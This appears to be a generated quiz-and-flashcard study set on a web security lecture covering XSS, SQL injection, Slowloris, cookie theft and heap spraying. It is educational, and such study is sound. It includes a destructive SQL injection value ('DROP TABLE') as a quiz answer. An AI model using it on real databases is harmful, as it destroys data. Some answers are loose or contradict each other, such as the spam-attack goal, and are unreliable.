Web Security Overview Quiz

Questions and Answers

Which of the following languages is NOT mentioned as part of the web security resources?

• JavaScript
• Java (correct)
• PHP
• Python

Web security only concerns static content and does not involve dynamic content.

False (B)

What middleware is frequently used to analyze URLs and compose web pages for Apache and MySQL?

PHP scripts

The _____ attack involves exploiting vulnerabilities in web applications through client-side scripts.

XSS

Match the following web security terms with their descriptions:

XSS = Cross-Site Scripting that injects malicious scripts SQL Injection = Manipulating SQL queries for unauthorized access Slowloris Attack = Overloading a server by opening many connections mod-security = A web application firewall for securing web applications

What is typically required for a web server to create dynamic content?

Connection to a database server (D)

Cookies can be utilized by attackers in XSS attacks to steal user information.

True (A)

What is the first step to execute the CGI script WealthTracker.cgi?

Fire up the Apache web server (B)

The WealthTracker.html file is supposed to send data back to the server.

False (B)

What does the command 'var cookie_info = document.cookie' do?

It retrieves the document's cookie information.

Heap spraying fills up memory with _____ bytes referred to as nop-sled.

no-op

Match the following steps of the Heap Spray Exploit with their descriptions:

Step 1 = Fill memory with no-op bytes Step 2 = Place malicious shell-executable code Step 3 = Dereference memory locations with no-op bytes Step 4 = Execute arbitrary shell code

What could potentially allow malicious attacks on a server when a user submits their credentials?

URL sent in clear text (C)

SQL injection attacks can only occur when input fields are not properly validated.

True (A)

What is the purpose of the PHP package 'php7.0-mysql'?

To allow PHP scripts to connect to MySQL databases.

The MySQL database used in the example is named __________.

Manager_db

Match the following terms with their descriptions:

PDO = PHP Data Objects for database connections SQL Injection = Attack to manipulate SQL queries row-level security = Restricts access to rows in a database table localhost.localdomain = Indicates a local server usage in email headers

How many accounts are created in the MySQL database for user access?

Three (C)

The presence of 'localhost.localdomain' in an email header can indicate it originated from a residential IP block.

True (A)

What action does the visitor take after filling out the form in RetrieveFromMySQL.html?

The visitor clicks the 'Submit' button.

When accessing the Maintenance_Schedule table, users can only view __________.

their own row

What type of web server works with the MySQL database in the mentioned example?

Apache (D)

What is the primary goal of the XSS attack with server-side injection described?

To cause a spam file to be downloaded (C)

The injected PHP code will be visible to clients when they view the page source in their browser.

False (B)

What is the IP address of the Web Hosting Service Provider?

192.168.1.105

The service that handles sending emails on the server is called ______.

Sendmail

Match the following entities with their associated IP addresses:

Web Hosting Service Provider = 192.168.1.105 Innocent Client = 192.168.1.103

Which of the following operating systems does the web hosting service provider use?

Ubuntu 10.04 (A)

The innocent client's web browser is Internet Explorer.

False (B)

What file is created by the uploadfile.php script?

A file identical to what the client uploaded, except for extra PHP code

The upload page provided to clients is called ______.

UploadYourWebPage.html

What is a major enabler of SQL injection exploits?

Using the GET method for form submission (A)

SQL injection can enable a user to delete all tables in a database.

True (A)

What does PDO stand for in the context of database security?

PHP Data Objects

The Slowloris Attack can potentially bring down a web server due to insufficient _____ available to it.

concurrency

Match the following SQL concepts with their descriptions:

SQL Injection = Exploiting vulnerabilities to manipulate database queries GET method = Form submission that leaks sensitive data through URL PDO = A PHP extension for secure database interactions Slowloris Attack = Creating numerous half-open TCP connections to exhaust server resources

What command can a user input to potentially delete all tables in the database?

nothing; DROP TABLE *; (B)

A Slowloris attack sends complete requests to a web server.

False (B)

Who authored the Slowloris attack?

Robert Hansen

A TCP connection established during a Slowloris attack is kept open until it _____ .

times out

What is the main reason SQL Injection exploits are successful?

SQL syntax treating commands and data equally (B)

Flashcards

XSS (Cross-Site Scripting) attack

A type of web-based attack where malicious JavaScript code is injected into a web server, leveraging its processes to execute harmful actions on the client-side.

Dynamic Content Creation and Web Servers

A web server's dynamic content creation often relies on data retrieved from a database, handled by 'middleware' like PHP scripts that analyze URLs and assemble web pages.

Middleware

The software or process that bridges between a web server and its associated database, managing data retrieval and page composition.

SQL Injection

A vulnerability that could expose web server data or lead to compromised user accounts by manipulating queries sent to the database.

Slowloris attack

A type of denial-of-service attack that overwhelms a server with slow, continuous requests, preventing it from serving legitimate clients.

mod-security Module

A web server security module (mod_security) analyzes incoming requests for malicious patterns, helping prevent attacks like XSS and SQL injection.

Client-Side XSS

Exploiting vulnerabilities in web applications to gain unauthorized access or control over user data by targeting the user's browser and side-stepping server-side security measures.

Server-side XSS

A malicious code injection technique that targets server-side scripting languages like PHP, aiming to exploit a vulnerability in the web application's handling of user-supplied data.

Server-side XSS Goal

The goal of this attack is to send spam emails silently to a list of email addresses without the user's knowledge.

Code Injection Location

The malicious PHP code is injected into the web page on the server, before it is sent to the user's browser. This makes the code invisible to the user.

PHP Execution

PHP code is executed on the server before the page is sent to the browser, making it impossible for the user to see the injected code in the page source.

UploadYourWebPage.html

An HTML file used by the web hosting provider to allow clients to upload their web pages.

uploadfile.php

A PHP file used to process the file uploaded by a client. The injected PHP code will be executed here.

sendmail

A tool for sending emails, likely accessed through the injected PHP code.

Spam File

This file contains a list of email addresses and content for emails to be sent.

mail.log

A log file that records email activity on the server, including sent and received emails.

Blocking emails from residential IP ranges

A security measure where organizations prevent emails from specific IP address ranges associated with residential units. This aims to mitigate spam and phishing attempts originating from residential networks.

Blocking "localhost.localdomain" in email headers

A security measure where organizations block emails containing "localhost.localdomain" within the email header. This string is often used by malicious actors to bypass security filters.

SQL Injection Attack

A type of attack where malicious code is injected into a web application's input fields to manipulate database queries. The injected code can be used to access or modify sensitive data.

MySQL with row-level security

A database management system that provides row-level security. This means that users can only access and modify data within their assigned rows.

PHP

A web server technology that allows dynamic content generation and database interaction. It can be used to create interactive websites.

MySQL

A database management system used to store and manage data in a relational database. It is commonly used with PHP to power dynamic websites.

PDO (PHP Data Objects)

A programming interface (API) that enables PHP scripts to interact with MySQL databases. It allows secure and efficient data access.

RetrieveFromMySQL.html

An HTML page that allows users to enter their MySQL username and password. This form data is then processed by a server-side script (RetrieveFromMySQL.php).

RetrieveFromMySQL.php

A server-side script (PHP) that handles the user credentials submitted by the RetrieveFromMySQL.html form. It attempts to retrieve data from the MySQL database based on the provided username and password.

Testing for vulnerabilities (SQL injection)

A technique used to test the security of a web application. Adversaries use different values in URLs to identify potential vulnerabilities and exploit them.

Heap Spray Exploit

A technique used to execute malicious code through a web browser by filling a large portion of the browser's memory with harmless instructions (nop-sleds) and then injecting the malicious code at the end. When the browser tries to access the memory, it ends up executing the harmful code.

XSS (Cross-Site Scripting) for Stealing Cookies

A type of cyberattack that uses malicious JavaScript code injected into a website to steal user cookies. This allows the attacker to impersonate the user and access their online accounts.

WealthTracker.cgi

A CGI script that keeps track of the user's visits and wealth changes. It's vulnerable to XSS attacks because it directly processes user input, which can be exploited for malicious actions.

engineering.purdue.edu Web Server

A web server that hosts a CGI script called "Collector.cgi." This script collects and stores data sent to it via the "msg" parameter in a file called "collections.txt."

Nop-Sled

No-operation (nop) bytes that are used to fill up a large portion of memory in the heap spray exploit. They serve as a buffer and ensure that the malicious code is executed once the browser accesses the memory.

GET Method Vulnerability for Form Submissions

A vulnerable website feature that sends all form data as part of the URL, making it easily manipulated or intercepted by attackers. This vulnerability can facilitate other attacks like SQL Injection.

User Input Filtering

A technique that filters user-provided input before sending it to a database, preventing malicious code from being executed and protecting the database from SQL injection attacks.

ClientSocketFetchDocs.py

A Python script that simulates a legitimate GET request, sending a completed query to a web server, demonstrating the expected behavior of a normal HTTP request.

netstat

A command-line utility used to monitor and display network connection information, including active TCP connections, for analyzing server activity. Can be used to identify signs of a Slowloris attack.

PDO (PHP Data Objects) Database Driver

A specific type of database driver, designed specifically for PHP, providing a standard interface for communicating with various database systems and offering enhanced security against SQL injection vulnerabilities.

Study Notes

Lecture 08: Web Security

• The lecture focuses on web security, covering issues relevant to web servers, browsers, and user interactions.
• Prerequisites for the lecture include URL, HTTP, and HTML knowledge.
• Software like Apache2 web server, PHP7, MySQL, and sendmail are required.
• Programming languages such as PHP, Perl, Python, JavaScript, and CGI scripts are used in web development.
• Resources for further study include PHP comparisons, manuals, tutorials, MySQL documentation, PDO tutorials, Modsecurity projects, JavaScript tutorials, and OWASP resources for application security.
• Topics outlined include XSS attacks (server-side injection), SQL injection attacks, Slowloris attacks, mod-security, client-side XSS, cookie theft using XSS, and heap spray exploits.

Prerequisites

• URL, HTTP, and HTML knowledge are needed.
• Apache2 web server installed on an Ubuntu machine.
• Apache2 server is enabled with PHP7.
• MySQL database management system used as database backend.
• A driver to enable PHP communication with MySQL.
• Sendmail program running on the server.

Languages

• PHP
• Perl
• MySQL
• Python
• JavaScript
• CGI scripts

Resources

• PHP vs. NodeJS comparison and benchmarks (2018)
• PHP Manual
• PHP Tutorial
• MySQL Documentation
• PDO tutorials (addressing PHP delusions)
• Modsecurity Project
• JavaScript Tutorial
• OWASP Foundation (Open Source Foundation for Application Security)

Outline

• XSS attack with server-side injection
• SQL Injection Attack
• Slowloris Attack
• mod-security
• Client-side XSS
• Cookies and XSS for stealing cookies
• Heap Spray Exploit

Web Security

• Web security addresses issues specific to how web servers display content to browsers, how browsers interact with servers, and how users interact with browsers.
• The World Wide Web, web servers initially offered only static content.
• Now, dynamic content is common, often tied to a database server.
• Middleware (often PHP scripts) is frequently used for this purpose, particularly with Apache and MySQL.

XSS Attack with Server-Side Injection

• This type of attack injects malicious code, often PHP, during upload processes.
• The injected code isn't visible in the browser's source.
• The goal might be to download a spam file from a third-party source as soon as the page loads.
• A diagram illustrates the attack flow, showing the attacker's web hosting provider injecting the script into the web pages uploaded by users.

XSS Attack with Server-Side Injection (Details)

• Specific details are provided about the web servers, clients, and email providers involved.
• Example code snippets showing the injected PHP code demonstrate how the attack works.

SQL Injection Attack

• PHP and MySQL work together to manage web server databases. The "php7.0-mysql" package allows for direct database connections via a PHP Data Objects (PDO) based driver.
• A MySQL database (Manager_db) with user accounts (Operator1, Operator2, Operator3) and a Maintenance_Schedule table are setup for illustration.
• The initial table setup shows each operator's schedules relating to specific equipment.

SQL Injection Attack (Details)

• An attacker could insert malicious code to modify or delete data (delete all tables) in the database.
• An important factor is that the SQL syntax places commands and data on equal footing.

Security against SQL Injection

• To prevent this, user inputs need careful filtering and restricted command access.
• PDO (PHP Data Objects) based drivers offer consistent API usage across diverse database systems. They often include built-in security measures against SQL Injection.

Kak's Code (Lecture 27)

• Specific file names (RetrieveFromMySQL.html, RetrieveFromMySQL.php) are listed for code.

The Slowloris Attack

• Developed by Robert Hansen in 2009.
• The attack involves sending incomplete HTTP requests to a web server.
• This keeps many TCP connections open, overwhelming the server's capacity.

The Slowloris Attack: Example 1, 2, and 3

• Illustrations of client-side scripts (ClientSocketFetchDocs.py, TestHTTPServerWithNoCRLF.py) and server-side scripts (CheckNetstat.sh, RepeatedAttack.sh, TerminateLoris.sh) used in the attack demonstrate the attack's method.

SlowPost Attack

• Similar to Slowloris but uses POST requests instead of GET requests.

Kak's Code (Lecture 28)

• Specific file names (WealthTracker.html) for the relevant code are listed.

XSS for Stealing Cookies

• Third parties can steal cookies via XSS attacks. JavaScript is used in these attacks.

• Example steps for a cookie-stealing attack are given, showing how to bring up the JavaScript console, and the required commands are illustrated to steal cookies.

• The web server named 'Collector.cgi' is part of the attack and stores stolen cookies.

The Heap Spray Exploit

• This exploit uses JavaScript to execute shell commands by exploiting how script engines manage memory.

Heap Spray References

• References to documentation on the heap spray technique are provided.

Web Vulnerabilities

• Historical security issues with browsers' interactions with servers (e.g., Samy worm).

Browser Vulnerabilities

• Vulnerabilities like JavaScript and the DOM (Document Object Model) are discussed.
• Another common technique (e.g. using <iframe>) is addressed, as well as the potential for another web page to be embedded within the target page.

Web Application Security

• The OWASP (Open Web Application Security Project) is mentioned as a notable resource.
• Tools like W3af for testing web applications for vulnerabilities (SQL injection, cross-site scripting, remote file inclusion) are discussed.

Reference

• A PDF file reference (for subverting AJAX) is listed.

Description

Test your knowledge on web security concepts, including dynamic content, common attacks, and functionalities of web servers. This quiz covers various critical topics about safeguarding web applications and understanding vulnerabilities. Challenge yourself with matching terms and answering specific questions!